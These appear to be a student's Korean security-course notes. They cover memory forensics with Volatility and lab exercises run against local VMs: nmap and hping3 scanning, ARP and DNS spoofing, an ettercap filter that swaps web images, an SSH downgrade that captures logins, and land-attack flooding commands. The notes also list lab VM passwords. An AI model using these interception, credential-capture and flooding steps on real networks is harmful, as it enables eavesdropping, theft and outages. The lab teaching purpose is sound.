BA

PCI - 단가가 높음

- 미리 설치되어 있어야 하는 단점 

FireWire - DMA(직접 메모리 접근) 사용

hardware memory dump 장/단점

-> 무결성이 깨지기 쉬움

BSOD(blue screen of death)

-----------

software memory dump

-> 추가 장치 필요 없음 

-> 안정적

DD(disk dump)

- unix용 도구 (windows도 존재, windd)

-> 하드웨어를 이미지뜨는 개념

-> 사용자가 접근 가능한 모든 data를 byte 혹은 block단위로 복사

KntDD

win32(64)dd & dumpit

FTK imager 

OSForensic

RedLine -> 제일 나음

crash dump

-> 순수성이 높다

full memory dump -> 유용한 정보 많음 

small memory dump -> crash 발생 원인만 본다  -> 볼 필요 없음

cold boot 

-> 말그대로 얼려서 다른 컴퓨터로 옮기면 메모리가 보존되는 효과 -> 1회성이라 안 씀 

물리적 메모리, 가상적 메모리 

volatility

memoryze

HBGary Responder

volatility 주요 명령어

pstree

-> 부모자식 관계 확인하여 악성코드 여부 확인 가능

dlllist

-> dll injection 여부 -> virus total 

   -> anubis -> 시간이 좀 오래걸림, 영어 

getsids

memdump

connections  

-> 네트워크 상태 확인 

hivelist

-> 레지스트리 값 

lsadump

malfind

execdump -> 실행파일로 검출이 가능

---------------

프로세스 목록

vol.py -f [image] --profile=[profile] pslist

vol.py -f [image] --profile=[profile] psscan

vol.py -f [image] --profile=[profile] psxview

vol.py -f [image] --profile=[profile] pstree

프로세스관련정보

vol.py -f [image] --profile=[profile] dlllist

vol.py -f [image] --profile=[profile] vadinfo

vol.py -f [image] --profile=[profile] handles

vol.py -f [image] --profile=[profile] privs

vol.py -f [image] --profile=[profile] threads

PE관련 정보 추출

vol.py -f [image] --profile=[profile] -D [dir] moddump

vol.py -f [image] --profile=[profile] -D [dir] procexedump

vol.py -f [image] --profile=[profile] -D [dir] procssdump

vol.py -f [image] --profile=[profile] -D [dir] procmemdump

vol.py -f [image] --profile=[profile] -D [dir] dlldump

인젝션코드확인

vol.py -f [image] --profile=[profile] -D [dir] malfind

vol.py -f [image] --profile=[profile] dlmosules

vol.py -f [image] --profile=[profile] impscan

네트워크관련정보

vol.py -f [image] --profile=[XP/2003 profile] connections 

vol.py -f [image] --profile=[XP/2003 profile] sockets

vol.py -f [image] --profile=[XP/2003 profile] connscan 

vol.py -f [image] --profile=[Vista/2008/7 profile] netscan 

레지스트리관련

vol.py -f [image] --profile=[profile] hivelist

vol.py -f [image] --profile=[profile] printkey

vol.py -f [image] --profile=[profile] userassist

vol.py -f [image] --profile=[profile] shellbags

vol.py -f [image] --profile=[profile] shimcache

CheatSheet_v2.4.pdf

phx_mem.pdf

1.포트 스캔
nmap -sS 192.168.8.136   :TCP 스캔(스틸스 스캔)
nmap -sX 192.168.8.136   :TCP 스캔(Xmas 스캔)
nmap -sF 192.168.8.136   :TCP 스캔(FIN 스캔)
nmap -sN 192.168.8.136   :TCP 스캔(NULL 스캔)
nmap -sU 192.168.8.136   :UDP 스캔
 -O OS 확인
 -F framentation 단편화해서 보내기(방화벽 통과하기위해)


2. DNS spoofing
victim : 외부 dns 로 설정할것.
 내부 공격자보다 dns 서버의 정상적인 패킷이 먼저 응답하게 되면
 공격이 되지 않음.
@attacker
 터미널1#arpspoof -t [victim_ip] [gateway_ip]
 터미널2#fragrouter -B1
 터미널3#service apache2 start  
  웹브라우저에서 웹서비스 확인하기
          #cd /tmp
          #cat > hosts
          210.109.3.65  *naver.com  (네이버 dns요청시 강사ip 응답)
          192.168.8.x    *daum.net   (다음요청시 kali ip 응답
          ctrl+d
          #cat hosts
          #dnsspoof -f /tmp/hosts
          대기
@ victim
 명령프롬프트 창 > nslookup www.naver.com
 웹브라우저로 www.naver.com



암호화 하지 않는 프로토콜 : HTTP (인코딩), DNS, TELNET, FTP, SMTP, POP3
  arp, ICMP


3. HTTP MITM 
필요한 시스템 : attacker (kali 1.0), vicitm(winxp,win7), centos(웹서버)
@kali (1.0)
부팅 id:root , pw: toor
@centos
압축 풀어서 vmware불러오기
부팅 ID: root, PW:qwer1234

각 시스템 IP, MAC주소 확인
kali1.0  	192.168.8.137	00:0c:29:9c:be:b7
win7	192.168.8.135	00-0C-29-84-9A-B1
centos	192.168.8.138	00-0c-29-06-ff-bf
gw	192.168.8.2	00-50-56-eb-31-16

보여줄 가짜그림을 다운로드 함. 작동할 웹서버에서 해야함.
 웹서비스 활성화, 그림다운로드
 centos인 경우)
  #service httpd service
  웹브라우저로 원하는 그림을 다운로드하기 (디폴트 경로: 바탕화면)
     그림 저장 위치 : /var/www/html/a.jpg
 kali인 경우)
  #service apache2 service
  웹브라우저로 원하는 그림을 다운로드하기 (디폴트 경로: root)
      그림 저장 위치 : /var/www/a.jpg

 다운로드한 그림을 저장위치 -> 웹서비스 폴더로 이동해야함.


img src='www.naver.com/abc.jpg'
img src="www.naver.com/abc.jpg"
img src="http://192.1688.137/a.jpg"www.naver.com/abc.jpg
img src= 부분을  img src=http://192.168.8.137/a.jpg
 
replace("a", "b");
replace("img src=", "img src=\"http://192.168.8.137/a.jpg\"");

 replace("img src=", "img src=\"http://192.168.8.137/a.jpg\"");

사용할 툴 : ethercap, etterfilter(컴파일러)
 html를 바꾸는 소스를 컴파일러해야함 -> ethercap 툴에서 이용


컴파일
 gcc -o 결과물 원본소스
 gcc -o  a.sh  a.txt
 etterfiltr -o  결과물명  원본소스명
                 filter.txt     filter.sh


스위치 등 네트워크 장비의 원격접속을 telnet을 많이 사용함
하지만 telnet은 도청에 약함.

SSH server  -> /etc/ssh/sshd_config
  Protocol 2		-> ssh 헤더 Protool: SSH-2.0-Openssh
 
  Protocol 1		-> ssh 헤더 Protool: SSH-1.5-Openssh

  Protocol 1,2		-> ssh 헤더 Protool: SSH-??-Openssh

필요한 시스템: attacker(kali), ssh server(centos), ssh client(xp)

ssh header를 가지고 와서 조작 (1.99 -> 1.5로)
kali에 패킷을 조작하는 소스가 있음.

사용툴 : etterfilter, ettercap

공격대상 : ssh client192.168.8.136 , ssh server 192.168.8.138	

@kali
#ls /usr/share/ettercap
   ettercap.filter.ssh 파일 확인
#cd /usr/share/ettercap
#ls
	etter.filter.ssh
#cat etter.fiter.ssh
#etterfilter -o ssh.sh etter.filter.ssh
#ls
	ssh.sh
#ettercap -G
  
  1) netmask : 255.255.255.0
  2) eth0인터페이스 인식 -> 메뉴 변경
  3) 공격대상 hosts  can하기.
  4) scan한 hosts를 목록확인(list)
  5) ssh.sh파일을 filter 적용 (메뉴 filter에서 불러오기)
  6) 화면에서 target선정, 
	ssh client 클릭 -> TARGET1 클릭
	ssh server 클릭 -> TARGET2클릭
  7) mitm- arp posioning (remote 스니핑만 체크) 
  8) 공격 sniff start
  9) 대기

@victim
ssh clinet 프로그램으로 ssh server에 접속.
패킷캡쳐한 파일을 보고 작동 버전학인
PD/PW확인됨.


  

-------------------

  

#vi filter.txt
if (if.proto == TCP && tcp.src == 80) {
 replace("img src=", "img src=\"http://192.168.8.135/a.jpg\"");
 replace("IMG SRC=", "IMG SRC=\"http://192.168.8.135/a.jpg\"");
 msg("Replaced the pic. \n);
}
#etterfilter -o filter.sh filter.txt
#ettercat -T -q -F filter.sh -M ARP /victim IP/ //   -> 2.0에서는 token 문제일어남

공격대상자 : CETNOS, WIN7, WINXP
 winxp : 압축해제 -> .vmx 파일을 vmware 불러오기.
   암호없음.
 win7 : .ova  파일을 vmware에서 불러오면 import 됨.(압축풀림)
   암호: P@ssw0rd (대문자P, 특수문자@, 숫자0)
 centos : 압축해제-> .vmx 파일을 vmware 불러오기.
  암호 : root / qwer1234

 windows시스템은 부팅 -> 윈도우업데이트 해제,  방화벽 해제

각시스템의 IP, MAC주소 확인
kali	192.168.8.134	00:0c:29:ac:32:60
win7	192.168.8.135	00-0C-29-84-9A-B1
winxp
centos



*IP패킷 조작
 툴 : HPING3
 도움망 : #hping3 -h

*포트스캔
-UDP
 udp 세그먼트를 조작해서 전송을 하면은 그에 되돌아오는 패킷으로
 서버의 서비스 활성화 여부를 판단할수있음.
    server				client
   SNMP (161)<----------------------------서비스요청

   server				client
   SNMP 서비스안함<-----------------------서비스요청
   나는 SNMP서비스안해요------------------> icmp

 icmp type3 code 3 응답이 오면 udp 해당포트 사용하지 않음
 응답이 안오면 해당서비스 사용하거나 방화벽에 막힘.

@kali : udp패킷을 조작해보자.
#hping3 -2 -p 53 192.168.8.135

#hping3 -2 -p 137 192.168.8.135

-TCP
 TCP 세그먼트를 조작해서 전송했을 때, 
 SYN+ACK 수신하게 되면 해당 서비스를 하고 있음.
 RST+ACK 수신하게 되면 해당 서비스를 하지 않는다.
   server				client
   HTTP 서비스함<--------SYN---------------서비스요청
     ---------------------SYN ACK------------>    

   server				client
   HTTP 서비스안함<--------SYN---------------서비스요청
     ---------------------RST ACK------------>    

@kali
#hping3 -p 80 192.168.8.135 -S

#hping3 -p 445 192.168.8.135 -S

tcp connect()  : syn, syn+ack, ack로 서버에 로그를 남금
스탤스 (half open) scan : syn, syn+ack, reset으로 로그를 남기지않음.
ack scan
fin scan
null scan
xmas scan
idle scan
 등.
tcp flags는 (혼잡제어용) 8bit  총 나올수 있는 경우의 수는 2^8=256
 그중에서 몇 가지 경우의 수만 사용함.
 나머지 경우로 전송하는 경우 에러가 날수있음.

스캔툴 : 가장많이 사용 nmap  (gui Zenmap) nmap.org
#nmap -h
#nmap -sU [IP나 Netwok주소]   : 포트지정하지않으면 전체포트를 스캔
#nmap -sS [N주소] -p 80  :

& nmap 예제 올리기.

*spoofing 속이다
  - IP spoofing  : source 주소를 속임. 다른공격에 같이 사용됨.
  - DNS spoofing : DNS 서비스, dns 요청에  대한 가짜 응답.
  - ARP spoofing : IP에 대한 mac주소를 가짜정보를 줌. MITM으로
    패킷을 가로채어 도청이나 조작을 할 수 있음.

@kali
ip spoofing
 #ping  192.168.8.135
   icmp src 192.168.8.134, dst 192.168.8.135

 #hping3 -1 192.168.8.135 -a 192.168.8.200
   icmp src 192.168.8.200, dst 192.168.8.135 (request만 발생)
 #hping3 -1 192.168.8.135 -a 192.168.8.2
   icmp src 192.168.8.2, dst 192.168.8.185 (게이트웨이 replay전송)
 #hping3 -1 192.168.8.135 -a 1.1.1.1
   icmp src 1.1.1.1, dst 192.168.8.185

-> 응용공격
 tcp syn flooding,  idle scan, smurf, 
 알고리즘 관련  land attack (DoS 중의 하나)
 
*land attack 
land : 땅, 교착상태에 빠지다.
  주소를 spoofing 속여서 전송하는데,
  source 정보=destiantion 정보
  ex) icmp src ip = dst ip
    공격받는 자는 이 패킷받아서 다시 자신에게 보내려고 함. (예전, win95)
    지금은 OS가 해당 패킷을 drop하기 위해서 resource를 사용 
   패킷을 많이 발생시키는 많은 패킷을 수신함으로 많은 리소스를 사용-> 부하.
 ex) tcp srcip=dstip, src port=dst port
@kali
#hping3 -1 192.168.8.135 -a 192.168.8.135
#hping3 -1 192.168.8.135 -a 192.168.8.135 --fast  (초당10개)
#hping3 -1 192.168.8.135 -a 192.168.8.135  -i u10000  (초당10개)
#hping3 -1 192.168.8.135 -a 192.168.8.135 --faster  (초당100개)
#hping3 -1 192.168.8.135 -a 192.168.8.135  -i u1000  (초당100개)
#hping3 -1 192.168.8.135 -a 192.168.8.135  -i u100   (초당1000개)
#hping3 -1 192.168.8.135 -a 192.168.8.135  -i u10   (초당10000개)
#hping3 -1 192.168.8.135 -a 192.168.8.135 --flood  (가능한한 많이)


* arp spoofing 
각시스템의 IP, MAC주소 확인
kali	192.168.8.134	00:0c:29:ac:32:60
win7	192.168.8.135	00-0C-29-84-9A-B1
gateway 	192.168.8.2           00-50-56-eb-31-16
winxp	192.168.136	 00-0C-29-4F-27-65
cmd> arp -a
>arp -d

IP에 해당하는 mac주소를 가짜를 전달함.
공격당하는 시스템은 arp cache table에 가짜 정보를 입력
이 가짜를 정보를 가지고 패킷을 전송하게되어 다른제3자나
공격자에게 전달하게 됨.

필요한 시스템 : 공격자 kali, win7(winxp)

   attackr		victim(wn)		gateway
 192.168.8.135      192.168.8.136		192.168.8.2
 mac:AA		mac:BB			mac:CC
  가짜arp reply------>	arp table저장
    (192.168.8.2=AA)	
		arp table
		192.168.8.2=AA
		data 전송
 <-----------------------

사용할 툴 : arpsoof 

공격당하기전 vicitm arp table
C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.8.136 --- 0x2
  Internet Address      Physical Address      Type
  192.168.8.1           00-50-56-c0-00-08     dynamic
  192.168.8.2           00-50-56-eb-31-16     dynamic

공격후 victim arp table 
C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.8.136 --- 0x2
  Internet Address      Physical Address      Type
  192.168.8.2           00-0c-29-ac-32-60     dynamic
ping 후
C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.8.136 --- 0x2
  Internet Address      Physical Address      Type
  192.168.8.2           00-0c-29-ac-32-60     dynamic
  192.168.8.134         00-0c-29-ac-32-60     dynamic
  192.168.8.135         00-0c-29-84-9a-b1     dynamic

 
* dns spoofing
DNS서비스
  도메인 네임 요청 ->
  해당 IP응답
 도메인에 해당하는 IP를 가짜로 전달.

필요한 시스템 : attacker(kali) victim(win) 

victim    				gw
 dns qeury ---------------------------------->  dns server

		attacker
  <------------------가짜 dns response

가짜 site 가게됨.

dns query를 도청을 하고있다가, 조작된 ㅣdns 전송해야함

@kali
t1#arpspoof -t [victim_ip]  192.168.8.2
t2#fragrouter -B1
t3#cat > hosts
 210.109.3.65	*naver.com
 210.109.3.65	*daum.net
  ctrl+d
 #dnsspoof

iso 파일 복사
vm 이미지 복사(centos, winxp, win7)

sniff 킁킁거리다
sniffing 도청.  - wireshark (패킷분석, 패킷도청)
spoofing 속이다. (IP spoofing, DNS spoofing, arp spoofing)

모의해킹용 라이브 CD (os설치하지 않고 사용가능)
 backtrack
 kali (backtrack 6버전) - 2015년 8월에 2.0 

수업시 공격자를 이용하기 위해 설치하기.
설치시 한국어로 하게 되면 한글폰트가 없어서 한글이 깨어져 보임.

해결 : 로그인 root -> 암호 설치시 입력한 암호
       바탕화면 우측메뉴에서 두번재 메뉴 = 터미널(E)
       터미널에서 #apt-get update
      #apt-get install fonts-nanum*
      #init 6 (재부팅)

한글폰트 다운로드 안될때
 #rm -rf /var/lib/dpkg/lock   (삭제 후 재부팅)
 #init 6
 다시 나눔 폰트 재설치하기.
미러링 사이트오류시
http://docs.kali.org/general-use/  이어서
 kali-linux-sources-list-repositories

  #vi /etc/apt/sources.list 파일을 수정
 deb http://http.kali.org/kali sana main non-free contrib
 deb http://security.kali.org/kali-security sana/updates main contrib non-free
 deb-src http://http.kali.org/kali sana main non-free contrib
 deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
 :wq 정보로 수정하기 사이트 참조.

#apt-get update
#apt-get install fonts-nanaum*
#init 6



* 해킹 과정
1. footprinting (공격대상을 찾고 정보 수집을 함)
2 scanning
3. enumeration 목록화
4. 시스템 침투 system hacking
5. 권한 획득
6. 권한 상성
7. 조작 및 삭제, updoad, daonload
8. 재침입을 위한 backdoor
9. 흔적제거

-scanning
   - sweep (ICMP ping) 공격대상 시스템이 켜져있는지 확인
   - port scan : 활성화 되어 있는 서비스 스캔
   - vulerability scan : 취약점 스캔

-정보수집 banner grabing 배너그래빙
 cmd> telnet www.x.co.kr 80
	GET index.html HTTP/1.1 (엔터2번) 요청
	-> 결과로 사용 프로그램, 버전 등 확인
 -그외 정보수집 site : netcraft
		구글 검색 이용

* port scna 종류
 - udp : 
 - tcp :
 
*취약점 스캔 vulnerability
 Nessus (무료.유료 설정이 까다로움)
 GFI LanGuard
 SAINT
 NBSA : microsoft 무료


구글검색 되지않게 robot.txt 생성하기.
 https://support.google.com/webmasters/answer/6062608?hl=ko

http://www.netcraft.com



googledork.pdf





mbsa.txt

MBSASetup-x64-EN.msi

-> 취약점 검색

igmp

igmp2

igmp3

rst 강제종료

fin

scan 

에이콘

와이어샤크를 이용한 실전 패킷 분석

ip fragment

최대 전송 단위(maximum transmission unit, MTU

mtu=1500 -> 넘어갈경우 fragment

mss=1460

3080 / 3050

1. TCP 최대 세그먼트 크기 (MSS, Maximum Segment Size)

  ㅇ TCP 세그먼트의 최대 크기 (TCP 헤더 제외된 페이로드 데이터 만의 크기)
     - TCP 1개 세그먼트로 보낼 수 있는 최대 데이터 크기 (IP 헤더,TCP 헤더 제외)
        . 미 지정시 기본값 536 바이트가 사용됨

  ㅇ MSS 값의 적정성
     - TCP 세그먼트가 너무 작으면 : 작아진 데이터 수용량, 잦은 전송 발생으로 비효율적
     - TCP 세그먼트가 너무 커지면 : MTU(최대전송단위) 이상이 되어 쪼개지는(IP 단편화가
                                    되는) 경우가 많이 발생되어 전송 비효율적


2. [TCP 옵션]  MSS 옵션 값

  ㅇ TCP 연결 설정 과정에서 통신 양단간에 MTU 값을 결정하기 위해 사용하는 TCP 옵션
     - 즉, IP 단편화시키지 않게하는 최대 크기
        . 통상적으로, 수신 TCP 모듈이 갖는 수신 버퍼 크기를 그 한계로 볼 수 있음
           .. 수신측이 이 값 이상을 허용 않는다고 통신 상대방에게 알리는 의지 표현

  ㅇ TCP는 양방향이므로, 참여 양단 호스트별로(각 방향으로) 다른 MSS 값이 사용됨
     - 즉, 고속 컴퓨터(큰 MSS 요구)와 저속 컴퓨터(작은 MSS 요구) 간의 통신

  ㅇ 일부 시스템에서는 자신이 속한 네트워크의 MTU 값에서 IP 헤더,TCP 헤더 40 바이트를
     뺀 값을 통보


3. MSS 옵션 필드 구성

  

  ㅇ 옵션 길이 : 총 32 비트 (4 바이트)
     - 옵션 type (1 바이트)   : Maximum Segment Size(MSS) 옵션임을 알림 (= 2)
     - 옵션 length (1 바이트) : MSS 옵션이 차지하는 총 길이(크기)를 말함 (= 4)
     - 옵션 value (2 바이트)  : MSS 값


4. MSS 옵션 전달 방식

  ㅇ TCP 연결설정을 위한 초기 세그먼트를 전송할 때, 
     - 그 세그먼트에 MSS 옵션을 포함시켜 그 값을 전달함

  ㅇ MSS 옵션은 SYN 제어비트(TCP 제어 플래그)가 설정된 상태에서의
     처음 2개의 세그먼트에서 만 나타남
     - 이것이 추후에 나타나면 이를 무시


5. MTU 및 MSS 크기 비교

  ㅇ MTU  :  IP 헤더, TCP 헤더, TCP 데이터를 모두 포함하는 길이

  ㅇ MSS  :  단지 TCP 데이터(페이로드) 길이 만을 의미

------------

시스템이 읽을 때는 url주소를 거꾸로 읽음

url 끝에 dot(.)이 생략


snmp 설정

ftp passive로 하면 방화벽 있어도 client가 파일 수신 가능

phpspy -> 웹쉘
php 쉽고 허술한 언어

최상위 디렉토리 접근

icmp flood



------

해킹된 사이트 목록
http://zone-h.org/


---

spooling file upload 취약점

networkminer
http://www.netresec.com/?page=NetworkMiner


packet generator 
https://bintray.com/pstavirs/ostinato/ostinato-bin-win32/0.7.1/view
http://ostinato.org/


wireshark filter
(icmp) && if(eth.addr==######)  -> boradcast 제외하기